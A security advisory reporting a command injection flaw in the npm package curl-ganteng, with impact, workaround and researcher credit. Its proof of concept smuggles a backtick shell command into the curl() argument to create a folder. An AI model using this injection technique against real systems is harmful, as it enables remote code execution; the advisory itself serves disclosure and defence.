Command injection vulnerability in curl-ganteng

Summary

Affected versions of curl-ganteng npm package are vulnerable to command injection vulnerability in the curl function.

Product

All versions of curl-ganteng npm package.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Steps to reproduce

Run the following PoC:

var curl = require('curl-ganteng')
curl.curl("google.com' `mkdir pwnd`'").catch((a) => {console.log(a)}).then((a) => {console.log(a)})

Expected result:

A new folder named ‘pwnd’ will be created.

Remediation

Currently there is no fix version released. As a workaround, avoid passing untrusted input into the vulnerable parameters when using the library.

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

1. curl-gateng npm package